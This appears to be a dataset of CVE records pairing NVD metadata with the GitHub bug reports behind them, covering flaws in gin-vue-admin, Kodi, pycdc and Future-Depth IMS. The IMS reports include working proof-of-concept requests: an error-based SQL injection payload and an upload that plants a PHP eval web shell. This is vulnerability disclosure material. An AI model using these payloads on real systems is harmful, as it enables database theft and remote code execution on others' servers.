<img width="692" alt="image" src="https://user-images.githubusercontent.com/4847400/206956812-21fe75e4-823b-4dda-a26b-1ef7b0169598.png">
2. The repaired place is: ExportExcel interface 。
<img width="735" alt="image" src="https://user-images.githubusercontent.com/4847400/206957099-ea2273ae-8f1c-4b0a-81c6-e9f02041dc4c.png">
This vulnerability is to repair the export interface and perform verification, but the download interface is not repaired, so the vulnerability still exists in the download interface and can be directly exploited.
### 修改建议
_No response_ | [Bug]: gin-vuew-admin downloadTemplate 存在1处安全漏洞 | https://api.github.com/repos/flipped-aurora/gin-vue-admin/issues/1309/comments | 1 | 2022-12-12T03:53:29Z | 2022-12-14T07:27:47Z | https://github.com/flipped-aurora/gin-vue-admin/issues/1309 | 1,490,875,430 | 1,309 | 4,709 |
CVE-2023-23082 | 2023-02-03T22:15:12.277 | A heap buffer overflow vulnerability in Kodi Home Theater Software up to 19.5 allows attackers to cause a denial of service due to an improper length of the value passed to the offset argument. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "PHYSICAL",
"availabilityImpact": "HIGH",
"baseScore": 4.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 0.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/xbmc/xbmc/commit/8c2aafb6d4987833803e037c923aaf83f9ff41e1"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/xbmc/xbmc/issues/22377"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/xbmc/xbmc/pull/22380"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/xbmc/xbmc/pull/22380/commits/00fec1dbdd1df827872c7b55ad93059636dfc076"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/xbmc/xbmc/pull/22380/commits/7e5f9fbf9aaa3540aab35e7504036855b23dcf60"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00009.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/xbmc/xbmc/commit/8c2aafb6d4987833803e037c923aaf83f9ff41e1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/xbmc/xbmc/issues/22377"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/xbmc/xbmc/pull/22380"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/xbmc/xbmc/pull/22380/commits/00fec1dbdd1df827872c7b55ad93059636dfc076"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/xbmc/xbmc/pull/22380/commits/7e5f9fbf9aaa3540aab35e7504036855b23dcf60"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00009.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kodi:kodi:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AEE0AAF6-FF9A-4120-8A0A-27505D73EDB7",
"versionEndExcluding": null,
"versionEndIncluding": "19.5",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/xbmc/xbmc/issues/22377 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"xbmc",
"xbmc"
] | <!--- Please fill out this template to the best of your ability. You can always edit this issue once you have created it. -->
<!--- Read the following link before you create a new problem report: https://kodi.wiki/view/HOW-TO:Submit_a_bug_report -->
## Bug report
### Describe the bug
After inserting the wrong/malformed image file into the USB storage device and mounting it, run kodi to run the Picture application. Exifparse crashes while scanning (reading) the wrong image files included in the USB storage device, leading to the termination of the process
## Expected Behavior
If you include an invalid image file, the kodi process crashes, you can check the memory address through the internal crash log.
## Actual Behavior
<!--- Tell us what happens instead -->
<!--- Put your text below this line -->
## Possible Fix
1. Please check the attached crash report information. It is reporting which functions are crashing. I guess is that it has to do with CExifparse function.
### To Reproduce
Steps to reproduce the behavior:
1. Save the attached image file to a USB storage device.
2. After recognizing the USB storage device in an environment that can operate kodi, such as Raspberry Pi, run the Picture application inside kodi.
3. After a while the process crashes.
4. If you need a crash log dump, you can enable the log dump option in preferences within kodi.
[image.zip](https://github.com/xbmc/xbmc/files/10334869/image.zip)
### Debuglog
[kodi_crashlog-20230103_053835.log](https://github.com/xbmc/xbmc/files/10334863/kodi_crashlog-20230103_053835.log)
[kodi_crashlog-20230103_071817.log](https://github.com/xbmc/xbmc/files/10334864/kodi_crashlog-20230103_071817.log)
[kodi_crashlog-20230103_071903.log](https://github.com/xbmc/xbmc/files/10334865/kodi_crashlog-20230103_071903.log)
### Screenshots

## Additional context or screenshots (if appropriate)
Here is some additional context or explanation that might help:

### Your Environment
Used Operating system:
<!--- Include as many relevant details about the environment you experienced the bug in -->
<!--- Put your text below this line. Checkboxes can easily be ticked once issue is created -->
- [O] Android
- [ ] iOS
- [ ] tvOS
- [0] Linux
- [ ] macOS
- [ ] Windows
- [ ] Windows UWP
- Operating system version/name: Raspberrypi 4
- Kodi version: Latest Version.
<!--- End of this issue -->
*note: Once the issue is made we require you to update it with new information or Kodi versions should that be required.
Team Kodi will consider your problem report however, we will not make any promises the problem will be solved.* | kodi image exif parse bug | https://api.github.com/repos/xbmc/xbmc/issues/22377/comments | 8 | 2023-01-03T07:36:49Z | 2023-01-16T16:30:18Z | https://github.com/xbmc/xbmc/issues/22377 | 1,517,028,904 | 22,377 | 4,710 |
CVE-2022-48078 | 2023-02-06T16:15:09.077 | pycdc commit 44a730f3a889503014fec94ae6e62d8401cb75e5 was discovered to contain a stack overflow via the component ASTree.cpp:BuildFromCode. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/zrax/pycdc/issues/295"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/zrax/pycdc/issues/295"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pycdc_project:pycdc:*:*:*:*:*:*:*:*",
"matchCriteriaId": "90559A1C-5C13-4763-AF94-F3D63A0CE7C8",
"versionEndExcluding": "2022-10-04",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/zrax/pycdc/issues/295 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"zrax",
"pycdc"
] | ## System info
Linux 4.15.0-117-generic #118-Ubuntu x86_64 x86_64 x86_64 GNU/Linux
latest master [44a730f](https://github.com/zrax/pycdc/commit/44a730f3a889503014fec94ae6e62d8401cb75e5)
## Command Line
./pycdc poc
## AddressSanitizer Output
```
=================================================================
==22513==ERROR: AddressSanitizer: stack-overflow on address 0x7ffebab9fa98 (pc 0x564add0f069f bp 0x7ffebabb0570 sp 0x7ffebab9fa60 T0)
#0 0x564add0f069e in BuildFromCode(PycRef<PycCode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:74
#1 0x564add137557 in decompyle(PycRef<PycCode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:3382
#2 0x564add12e23f in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2958
#3 0x564add131fe8 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:3188
#4 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#5 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#6 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#7 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#8 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#9 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#10 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#11 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#12 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#13 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#14 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#15 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#16 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#17 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#18 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#19 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#20 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#21 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#22 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#23 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#24 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#25 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#26 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#27 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#28 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#29 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#30 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#31 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#32 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#33 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#34 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#35 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#36 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#37 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#38 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#39 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#40 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#41 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#42 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#43 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#44 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#45 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#46 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#47 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#48 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#49 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#50 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#51 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#52 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#53 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#54 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#55 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#56 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#57 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#58 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#59 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#60 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#61 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#62 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#63 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#64 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#65 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#66 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#67 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#68 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#69 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#70 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#71 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#72 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#73 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#74 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#75 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#76 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#77 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#78 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#79 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#80 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#81 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#82 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#83 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#84 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#85 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#86 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#87 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#88 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#89 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#90 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#91 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#92 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#93 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#94 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#95 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#96 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#97 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#98 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#99 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#100 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#101 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#102 0x564add127964 in print_block /home/acesrc/git/pycdc_original/ASTree.cpp:2662
#103 0x564add12e095 in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2949
#104 0x564add12d04a in print_src(PycRef<ASTNode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:2897
#105 0x564add13978f in decompyle(PycRef<PycCode>, PycModule*) /home/acesrc/git/pycdc_original/ASTree.cpp:3468
#106 0x564add0ee53f in main /home/acesrc/git/pycdc_original/pycdc.cpp:91
#107 0x7f0b11510bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#108 0x564add0ed709 in _start (/home/acesrc/git/pycdc_original/asan_build/pycdc+0x44709)
SUMMARY: AddressSanitizer: stack-overflow /home/acesrc/git/pycdc_original/ASTree.cpp:74 in BuildFromCode(PycRef<PycCode>, PycModule*)
==22513==ABORTING
```
## POC
[poc.zip](https://github.com/zrax/pycdc/files/9960489/poc.zip)
| Stack-Overflow in ASTree.cpp | https://api.github.com/repos/zrax/pycdc/issues/295/comments | 0 | 2022-11-08T11:13:39Z | 2022-11-08T11:13:39Z | https://github.com/zrax/pycdc/issues/295 | 1,439,985,679 | 295 | 4,711 |
CVE-2022-45526 | 2023-02-08T19:15:11.430 | SQL Injection vulnerability in Future-Depth Institutional Management Website (IMS) 1.0, allows attackers to execute arbitrary commands via the ad parameter to /admin_area/login_transfer.php. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/Future-Depth/IMS/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/Future-Depth/IMS/issues/1"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:institutional_management_website_project:institutional_management_website:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "135391E2-2030-4646-8E52-FE3886A7ABB5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/Future-Depth/IMS/issues/1 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"Future-Depth",
"IMS"
] | ## Build environment: Aapche2.4.39; MySQL5.7.26; PHP7.3.4
At admin_ Area/login.php, in the 40-44 lines of code, enter the user name ad and password pwd and submit them to login through the post request_ transfer.php interface

Trace code to login_ Transfer.php, at lines 8-13

The account ad and password pwd inputted by the front end are assigned to the variables $ad and $pwd, which are directly brought into the database for query without filtering, resulting in a SQL injection vulnerability
* We can use sqlmap to validate

* Manual SQL injection proof
Get database version:

Get database user:

POC:
```
POST /admin_area/login_transfer.php HTTP/1.1
Host: imsvul.test
Content-Length: 169
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://imsvul.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://imsvul.test/admin_area/login.php?msg=Login_First
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=i7acqqkl9acdrrrhcbtdtvis5a
Connection: close
ad=123'|(select 1 where 1=1 AND (select 1174 from(select count(*),concat((select user()),floor(rand(0)*2))x from information_schema.tables group by x)a))||'&pwd=123456
``` | IMS has SQL injection vulnerability | https://api.github.com/repos/Future-Depth/IMS/issues/1/comments | 0 | 2022-11-14T10:18:10Z | 2022-11-14T10:18:10Z | https://github.com/Future-Depth/IMS/issues/1 | 1,447,776,942 | 1 | 4,712 |
CVE-2022-45527 | 2023-02-08T19:15:11.537 | File upload vulnerability in Future-Depth Institutional Management Website (IMS) 1.0, allows unauthorized attackers to directly upload malicious files to the courseimg directory. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/Future-Depth/IMS/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/Future-Depth/IMS/issues/2"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:institutional_management_website_project:institutional_management_website:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "135391E2-2030-4646-8E52-FE3886A7ABB5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/Future-Depth/IMS/issues/2 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"Future-Depth",
"IMS"
] | ## Build environment: Aapche2.4.39; MySQL5.7.26; PHP7.3.4
## 1.File upload vulnerability
In the file admin_ Area/courseinsert.php, in line 234-239 of the code
```html
<table border='2' align="center"><form method="post" action="course_insert.php" enctype="multipart/form-data">
<tr><td>COURSE NAME : </td><td><input type="text" name="cname" required="" autocomplete="off"></td></tr>
<tr><td>DURATION : </td><td><input type="text" name="drn" required="" autocomplete="off"></td></tr>
<tr><td>FEES : </td><td><input type="text" name="fee" required="" autocomplete="off"></td></tr>
<tr><td>UPLOAD PHOTO :</td><td><input type="file" name="pht" required="" autocomplete="off"></td></tr>
<tr><td></td><td><button class="btn btn-primary btn-lg">Insert Course</button></td></tr>
```
After entering the information, click the button to send the information to course in post mode_ insert.php
, continue to follow up the code
course_insert.php:
In lines 10 - 13:

```php
$fname=$_FILES['pht']['name'];
$file_temp_loc =$_FILES['pht']['tmp_name'];
$file_store="courseimg/".$fname;
move_uploaded_file($file_temp_loc,$file_store);
```
$_ FILES Get the file information uploaded by post, $file_ store
Define the file storage location. In this process, the uploaded file type is not verified. Use move_ uload_ file()
Function to transfer all uploaded files to courseimg/directory
In lines 14 to 28

```php
$s=mysqli_query($con,"insert into course(c_name,duration,fees,photo) values('$cname','$drn','$fee','$file_store')");
if($s==1)
{
$t=mysqli_query($con,"select * from course where c_name='$cname'");
$r=mysqli_fetch_array($t);
$id=$r['id'];
$i=100+$id;
$uid="BTT/CRS/".$i;
$udt=mysqli_query($con,"update course set c_id='$uid' where c_name='$cname'");
header("location:courseinsert.php?ms=done");
}
else
{
header("location:courseinsert.php?ms=not_done");
}
```
mysqli_ query returns the execution result of the database statement. $s is the value returned by executing the SQL statement. If the SQL statement is executed successfully, it returns true, $s==1. When new data is inserted into the database, the url jumps to: courseinsert.php? ms=done
Otherwise, the url will jump to courseinsert. php? ms=not_ done
To sum up, in the process of uploading a file, first upload the file to the local courseimg directory, and then save the path of the successfully uploaded file in the database
Therefore, even if the uploaded file is not stored in the database, the uploaded file will be saved in the courseimg/directory under the current path, which is: admin_ area/courseimg/

Upload-POC:
```html
POST /admin_area/course_insert.php HTTP/1.1
Host: imsvul.test
Content-Length: 500
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://imsvul.test
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1EAN9nvnAL0aI3UM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://imsvul.test/admin_area/courseinsert.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=i7acqqkl9acdrrrhcbtdtvis5a
Connection: close
------WebKitFormBoundary1EAN9nvnAL0aI3UM
Content-Disposition: form-data; name="cname"
ace
------WebKitFormBoundary1EAN9nvnAL0aI3UM
Content-Disposition: form-data; name="drn"
ace
------WebKitFormBoundary1EAN9nvnAL0aI3UM
Content-Disposition: form-data; name="fee"
ace
------WebKitFormBoundary1EAN9nvnAL0aI3UM
Content-Disposition: form-data; name="pht"; filename="ace.php"
Content-Type: application/octet-stream
<?php eval($_POST["ace"]);?>
------WebKitFormBoundary1EAN9nvnAL0aI3UM--
```
After sending the POC packet, click admin_ area/courseimg/ Generate a PHP file named ace under the directory
Connect using the webshell administration tool

| IMS has an arbitrary file upload vulnerability | https://api.github.com/repos/Future-Depth/IMS/issues/2/comments | 0 | 2022-11-14T11:15:40Z | 2022-11-14T11:15:40Z | https://github.com/Future-Depth/IMS/issues/2 | 1,447,865,544 | 2 | 4,713 |
CVE-2022-45755 | 2023-02-08T19:15:11.600 | Cross-site scripting (XSS) vulnerability in EyouCMS v1.6.0 allows attackers to execute arbitrary code via the home page description on the basic information page. | {
